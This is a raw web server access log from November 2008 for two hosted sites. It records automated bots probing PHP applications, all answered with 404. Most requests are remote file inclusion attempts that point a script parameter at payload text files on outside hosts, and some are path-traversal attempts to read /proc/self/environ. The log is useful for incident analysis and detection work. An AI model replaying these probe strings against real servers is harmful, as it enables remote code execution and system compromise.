89.218.85.18 - - [19/Nov/2008:05:16:54 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:16:54 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
98.193.117.182 - - [19/Nov/2008:05:16:58 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
98.193.117.182 - - [19/Nov/2008:05:16:58 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
98.193.117.182 - - [19/Nov/2008:05:16:58 -0800] "GET /logs/scripts.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:17:13 -0800] "GET /logs/access_080929.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:17:14 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
89.218.85.18 - - [19/Nov/2008:05:17:14 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
89.218.85.18 - - [19/Nov/2008:05:17:14 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
213.207.110.102 - - [19/Nov/2008:05:17:53 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:17:53 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:17:53 -0800] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:18:03 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:18:05 -0800] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:18:05 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:19:31 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:19:32 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:19:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:19:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:19:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:19:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:19:33 -0800] "GET /logs/access_080920.log//templates/mangobery/footer.sample.php?Site_Path=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:19:33 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:19:33 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:05:19:47 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
74.7.219.93 - - [19/Nov/2008:05:19:47 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
74.7.219.93 - - [19/Nov/2008:05:19:47 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
208.80.194.27 - - [19/Nov/2008:05:21:38 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; HbTools 4.8.0; PeoplePal 3.0)" "www.nysracc.com"
201.94.235.191 - - [19/Nov/2008:05:22:09 -0800] "GET /logs/scripts.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
201.94.235.191 - - [19/Nov/2008:05:22:09 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
201.94.235.191 - - [19/Nov/2008:05:22:09 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:22:26 -0800] "GET /logs/access_081003.log//templates/mangobery/footer.sample.php?Site_Path=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:22:51 -0800] "GET /logs/access_081021.log//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:22:51 -0800] "GET /appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:22:52 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:22:57 -0800] "GET /logs/access_081021.log//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:22:57 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:22:57 -0800] "GET /appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:05:23:06 -0800] "GET /logs/access_080911.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:05:23:08 -0800] "GET /logs/access_080911.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
98.199.39.40 - - [19/Nov/2008:05:23:23 -0800] "GET /logs/scripts.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:23:24 -0800] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:05:23:25 -0800] "GET /logs/access_080911.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:05:23:25 -0800] "GET /logs/access_080911.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:23:29 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
217.75.209.39 - - [19/Nov/2008:05:23:29 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
217.75.209.39 - - [19/Nov/2008:05:23:29 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
217.75.209.39 - - [19/Nov/2008:05:23:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
217.75.209.39 - - [19/Nov/2008:05:23:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
217.75.209.39 - - [19/Nov/2008:05:23:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
98.199.39.40 - - [19/Nov/2008:05:23:31 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /logs/access_081021.log%20%20/%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /logs/%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /logs/access_080923.log%20%20/%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /logs/access_081021.log%20%20/%3Chtml%3E%3Chead%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /logs/access_080923.log%20%20/%3Chtml%3E%3Chead%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /%3Chtml%3E%3Chead%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /logs/%3Chtml%3E%3Chead%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /%3Ctitle%3E404%20Not%20Found%3C/title%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /logs/%3Ctitle%3E404%20Not%20Found%3C/title%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /logs/access_080923.log%20%20/%3Ctitle%3E404%20Not%20Found%3C/title%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:09 -0800] "GET /logs/access_081021.log%20%20/%3Ctitle%3E404%20Not%20Found%3C/title%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /%3C/head%3E%3Cbody%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/%3C/head%3E%3Cbody%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/access_080923.log%20%20/%3C/head%3E%3Cbody%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/access_081021.log%20%20/%3C/head%3E%3Cbody%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /%3Ch1%3ENot%20Found%3C/h1%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/%3Ch1%3ENot%20Found%3C/h1%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/access_080923.log%20%20/%3Ch1%3ENot%20Found%3C/h1%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/access_081021.log%20%20/%3Ch1%3ENot%20Found%3C/h1%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /%3Cp%3EThe%20requested%20URL%20/technote7/data/board/pmmember/img/data/joomla.txt%20was%20not%20found%20on%20this%20server.%3C/p%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/%3Cp%3EThe%20requested%20URL%20/technote7/data/board/pmmember/img/data/joomla.txt%20was%20not%20found%20on%20this%20server.%3C/p%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/access_080923.log%20%20/%3Cp%3EThe%20requested%20URL%20/technote7/data/board/pmmember/img/data/joomla.txt%20was%20not%20found%20on%20this%20server.%3C/p%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/access_081021.log%20%20/%3Cp%3EThe%20requested%20URL%20/technote7/data/board/pmmember/img/data/joomla.txt%20was%20not%20found%20on%20this%20server.%3C/p%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /%3C/body%3E%3C/html%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/%3C/body%3E%3C/html%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:10 -0800] "GET /logs/access_080923.log%20%20/%3C/body%3E%3C/html%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
121.135.147.72 - - [19/Nov/2008:05:24:11 -0800] "GET /logs/access_081021.log%20%20/%3C/body%3E%3C/html%3Ehttp://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:24:49 -0800] "GET /logs/access_080923.log//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
94.23.0.147 - - [19/Nov/2008:05:25:25 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.nyassemblygop.org"
94.23.0.147 - - [19/Nov/2008:05:25:25 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.nyassemblygop.org"
94.23.0.147 - - [19/Nov/2008:05:25:25 -0800] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.nyassemblygop.org"
94.23.0.147 - - [19/Nov/2008:05:25:25 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.nyassemblygop.org"
94.23.0.147 - - [19/Nov/2008:05:25:25 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.nyassemblygop.org"
94.23.0.147 - - [19/Nov/2008:05:25:25 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.nyassemblygop.org"
94.23.0.147 - - [19/Nov/2008:05:25:25 -0800] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.nyassemblygop.org"
94.23.0.147 - - [19/Nov/2008:05:25:26 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:25:40 -0800] "GET /logs/access_080923.log//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:25:47 -0800] "GET /logs/access_081021.log//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:25:47 -0800] "GET /appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:25:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:25:55 -0800] "GET /appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:25:55 -0800] "GET /logs/access_081021.log//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:26:02 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
72.30.161.252 - - [19/Nov/2008:05:26:27 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:26:33 -0800] "GET /logs/access_081003.log%20//templates/mangobery/footer.sample.php?Site_Path=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
72.30.161.252 - - [19/Nov/2008:05:26:34 -0800] "GET /logs/access_080706.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:26:35 -0800] "GET /logs/access_080911.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:26:35 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
